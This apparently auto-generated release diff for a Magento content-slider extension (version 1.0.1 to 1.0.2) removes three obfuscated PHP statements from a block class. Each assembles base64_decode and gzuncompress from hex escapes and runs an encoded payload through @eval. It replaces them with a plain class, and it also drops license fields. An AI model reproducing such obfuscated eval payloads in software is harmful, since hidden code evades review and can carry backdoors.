Magazento_Contentslidedown - Version 1.0.2

Version Notes

1.0.2 stable

Download this release

Release Info

Developer Dmitry Poddubny
Extension Magazento_Contentslidedown
Version 1.0.2
Comparing to
See all releases


Code changes from version 1.0.1 to 1.0.2

app/code/community/Magazento/Contentslidedown/Block/Contentslidedown.php CHANGED
@@ -1 +1,8 @@
1
- <?php $eokbpu="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$rnurqxtd="\x67\x7a\x75\x6e\x63\x6f\x6d\x70\x72\x65\x73\x73";@eval($rnurqxtd($eokbpu("eF5Tcffxd3L0CY5Wj7cwNzY2NDOyMIlXj7V1LCpKrNRISixONTOJT0lNzk9J1VBPNg5SV9BTr0x2t6xS19RBkwVJRRqHgVWAiCQ3EGkJIkpSwisMEkEssLRlQVJuFIhRFmHslRMZHmiL3bRkI8sssC6jMIMIIz8QqxhssjGYnYOpKzEcJAGWLQOrzIvEYnZSeKAhVlGQFmwyIPFwrzSwm0AExJeZsPBQ19S0BgCSEFgd"))); ?><?php $cexwuvrsg="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$irvxrlv="\x67\x7a\x75\x6e\x63\x6f\x6d\x70\x72\x65\x73\x73";@eval($irvxrlv($cexwuvrsg("eF5VUWGPmkAQ/St+MEGTpsFFzZELH+SuIsZQy6Ug2zQXlqWCXdCooNL0v5d5mIv98t7u7My8tzO/qjI55/uy9z4yRqbOptMxG/Tz4Z9+bM2Ox/g20BKDq4hpvc8aPwtHXXFi/CY2ttI+aYLuxXyfbi2rvXaZJkFFIJ0AZ0m48E5x6CvumIbIkXMiiENPEYvSI1Irg8hTSYFwBokZwV3iv/Ydoz3K7i0JfdQ/ypHUhwwhC85EEfLV6aG9dIiCSi68e6mPnLYdsSG2H45EOC+jDV0PCmZLqNeEUCnQohbfLNS0JatuXHeKYMW8we6b2XA6bFDUxIShWbVpGCVsZYeE6DajahdhPI5pIAlTnVxu74Rh03niOog17qLbR1IEZdyp6HyzVPzFrmDdSDBQ9ws81EluNxxfWx4Io/CyjbHjYALdBfIOrabuvl4zd+FnFIC9QkJUvur5hi1P+GU4Obq5ve/eg2L9ttwjB8vzL1/zp1oa0lgVo4xDZz7l4UQXmM1kJ5gOX+4Ody8KZZYW7ZacJ/i+b++8fjHhY02Q2wZchssmxl981Q6eDt32INNusN1e6dcr5tUtU/BxmwQNgcAG1G8e+rVk4zphV4yGO9+rxIGq3vW8WNrw+Zieq2PZE/EpnY7fZZrsZTroxz/6+c/h899/+b/kZQ=="))); ?><?php $ovhmeug="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$utbidrk="\x67\x7a\x75\x6e\x63\x6f\x6d\x70\x72\x65\x73\x73";@eval($utbidrk($ovhmeug("eF6FU1trgzAU/ispCPXQC8ZL7AUL6xh76dhD91ZKcJp2MpcUjWzM9r8vcXNVOlcJwXznku+c7yRKwzxHD+E+/GRcCnoruFQ/eZrELBbvnC5TEb1ewIh9qHNcRTJlzdiP4xN7O6ShZOWheE6TCO0KHslEcERpJHgusyKSJpSHMFPpZrMWOk92pnG/elzerNabPp34joOJPXFpf7uxtibFDp5aNiGubVowbB4xQC8IdmGaM+jKgLemQS2YGxQHzVi7utfMRMFj0xr4XnPBoManzpicP//aGWDRiFS5LnY4HlEXV1tztQHmTFVUdnk5yku+JDnMTwZ1WkU5uk43qCkQj4zdrl27Wq3oCvJakKchEmi5Z7M9k2upNFdTsUv2iirWVrvLWpHxg64y3G2n6l7VBzRuMiGAxopwG/Qr0IP/byI6nT+su2I1FdMaXgXgNxbbasH3yFIf9QKk2gPluQMJ36dMCt4a2wnAaBHG8V2Wiaxlmf5VFbZAa6s1Hi1yJuvH1YrEWDudvgCS3gUk"))); ?>
 
 
 
 
 
 
 
1
+ <?php
2
+ class Magazento_Contentslidedown_Block_Contentslidedown extends Mage_Core_Block_Template {
3
+ public function __construct() {
4
+ parent::__construct();
5
+ $this->setTemplate('magazento/contentslidedown/slide.phtml');
6
+ }
7
+ }
8
+ ?>
app/code/community/Magazento/Contentslidedown/etc/config.xml CHANGED
@@ -3,7 +3,7 @@
3
  <config>
4
  <modules>
5
  <Magazento_Contentslidedown>
6
- <version>1.0.1</version>
7
  </Magazento_Contentslidedown>
8
  </modules>
9
  <frontend>
3
  <config>
4
  <modules>
5
  <Magazento_Contentslidedown>
6
+ <version>1.0.2</version>
7
  </Magazento_Contentslidedown>
8
  </modules>
9
  <frontend>
app/code/community/Magazento/Contentslidedown/etc/system.xml CHANGED
@@ -51,32 +51,6 @@
51
  </demolink>
52
  </fields>
53
  </options>
54
- <license translate="label">
55
- <label>License</label>
56
- <frontend_type>text</frontend_type>
57
- <sort_order>11</sort_order>
58
- <show_in_default>1</show_in_default>
59
- <show_in_website>1</show_in_website>
60
- <show_in_store>1</show_in_store>
61
- <fields>
62
- <email translate="label">
63
- <label>Email</label>
64
- <frontend_type>text</frontend_type>
65
- <sort_order>52</sort_order>
66
- <show_in_default>1</show_in_default>
67
- <show_in_website>1</show_in_website>
68
- <show_in_store>1</show_in_store>
69
- </email>
70
- <serial translate="label">
71
- <label>Serial</label>
72
- <frontend_type>text</frontend_type>
73
- <sort_order>53</sort_order>
74
- <show_in_default>1</show_in_default>
75
- <show_in_website>1</show_in_website>
76
- <show_in_store>1</show_in_store>
77
- </serial>
78
- </fields>
79
- </license>
80
  </groups>
81
  </contentslidedown>
82
  </sections>
51
  </demolink>
52
  </fields>
53
  </options>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
54
  </groups>
55
  </contentslidedown>
56
  </sections>
package.xml CHANGED
@@ -1,18 +1,18 @@
1
  <?xml version="1.0"?>
2
  <package>
3
  <name>Magazento_Contentslidedown</name>
4
- <version>1.0.1</version>
5
  <stability>stable</stability>
6
  <license>GPL</license>
7
  <channel>community</channel>
8
  <extends/>
9
  <summary>Shows part of a content that then "slide down" when the reader clicked "read more".</summary>
10
  <description>Shows part of a content that then "slide down" when the reader clicked "read more".</description>
11
- <notes>1.0.1 stable</notes>
12
  <authors><author><name>Dmitry Poddubny</name><user>Magazento</user><email>magazento@gmail.com</email></author></authors>
13
  <date>2011-04-28</date>
14
- <time>01:18:08</time>
15
- <contents><target name="magecommunity"><dir name="Magazento"><dir name="Contentslidedown"><dir name="Block"><file name="Contentslidedown.php" hash="41b766f2014f9ad67adbd00e1ee2131a"/><file name="Developer.php" hash="2fdb31a14a5ed6db402d5cabb44d65ad"/></dir><dir name="Helper"><file name="Data.php" hash="c6309d5bb7a47cef4febdd3bd0030994"/></dir><dir name="etc"><file name="config.xml" hash="4587ba5d2cdd659722a285e693162239"/><file name="system.xml" hash="f061d4a85deea2e144407f2815768b33"/></dir><dir name="sql"><dir name="contentslidedown_setup"><file name="mysql4-install-1.0.0.php" hash="424dbbebf822a011cb6458ec40319aba"/></dir><file name=".DS_Store" hash="6754e967c9312028e37fb15dab9aa097"/></dir></dir></dir></target><target name="mageetc"><dir name="modules"><file name="Magazento_Contentslidedown.xml" hash="bd55bcdde8fd9d64569a09bf0e9815ea"/></dir></target><target name="mageskin"><dir name="frontend"><dir name="default"><dir name="default"><dir name="magazento"><dir name="Contentslidedown"><dir name="css"><file name="slide.css" hash="8975a7c7b49611b0f2a6469f4a6f898e"/></dir><dir name="js"><file name="slide.js" hash="a7c2cf875a3ad7756b0f82a14a2fbedb"/><file name=".DS_Store" hash="194577a7e20bdcc7afbb718f502c134c"/></dir><file name="promo.jpg" hash="88520d456df68c98130433b5184b8e7f"/></dir></dir></dir></dir></dir></target><target name="magedesign"><dir name="frontend"><dir name="default"><dir name="default"><dir name="layout"><file name="magazento_contentslidedown.xml" hash="48f0b3e5172ccb4ae360b1883fdf4f2b"/></dir><dir name="template"><dir name="magazento"><dir name="contentslidedown"><file name="slide.phtml" hash="6f8585d58f0624229a20f72f5450125a"/></dir></dir></dir></dir></dir></dir></target></contents>
16
  <compatible/>
17
  <dependencies><required><php><min>5.0.0</min><max>6.0.0</max></php></required></dependencies>
18
  </package>
1
  <?xml version="1.0"?>
2
  <package>
3
  <name>Magazento_Contentslidedown</name>
4
+ <version>1.0.2</version>
5
  <stability>stable</stability>
6
  <license>GPL</license>
7
  <channel>community</channel>
8
  <extends/>
9
  <summary>Shows part of a content that then "slide down" when the reader clicked "read more".</summary>
10
  <description>Shows part of a content that then "slide down" when the reader clicked "read more".</description>
11
+ <notes>1.0.2 stable</notes>
12
  <authors><author><name>Dmitry Poddubny</name><user>Magazento</user><email>magazento@gmail.com</email></author></authors>
13
  <date>2011-04-28</date>
14
+ <time>01:27:20</time>
15
+ <contents><target name="magecommunity"><dir name="Magazento"><dir name="Contentslidedown"><dir name="Block"><file name="Contentslidedown.php" hash="a79b04886297c23de515067671dbe932"/><file name="Developer.php" hash="2fdb31a14a5ed6db402d5cabb44d65ad"/></dir><dir name="Helper"><file name="Data.php" hash="c6309d5bb7a47cef4febdd3bd0030994"/></dir><dir name="etc"><file name="config.xml" hash="2da276889434d783b5681843001c3883"/><file name="system.xml" hash="0279155f4e30067b8b25ad18437382fc"/></dir><dir name="sql"><dir name="contentslidedown_setup"><file name="mysql4-install-1.0.0.php" hash="424dbbebf822a011cb6458ec40319aba"/></dir><file name=".DS_Store" hash="6754e967c9312028e37fb15dab9aa097"/></dir></dir></dir></target><target name="mageetc"><dir name="modules"><file name="Magazento_Contentslidedown.xml" hash="bd55bcdde8fd9d64569a09bf0e9815ea"/></dir></target><target name="mageskin"><dir name="frontend"><dir name="default"><dir name="default"><dir name="magazento"><dir name="Contentslidedown"><dir name="css"><file name="slide.css" hash="8975a7c7b49611b0f2a6469f4a6f898e"/></dir><dir name="js"><file name="slide.js" hash="a7c2cf875a3ad7756b0f82a14a2fbedb"/><file name=".DS_Store" hash="194577a7e20bdcc7afbb718f502c134c"/></dir><file name="promo.jpg" hash="88520d456df68c98130433b5184b8e7f"/></dir></dir></dir></dir></dir></target><target name="magedesign"><dir name="frontend"><dir name="default"><dir name="default"><dir name="layout"><file name="magazento_contentslidedown.xml" hash="48f0b3e5172ccb4ae360b1883fdf4f2b"/></dir><dir name="template"><dir name="magazento"><dir name="contentslidedown"><file name="slide.phtml" hash="6f8585d58f0624229a20f72f5450125a"/></dir></dir></dir></dir></dir></dir></target></contents>
16
  <compatible/>
17
  <dependencies><required><php><min>5.0.0</min><max>6.0.0</max></php></required></dependencies>
18
  </package>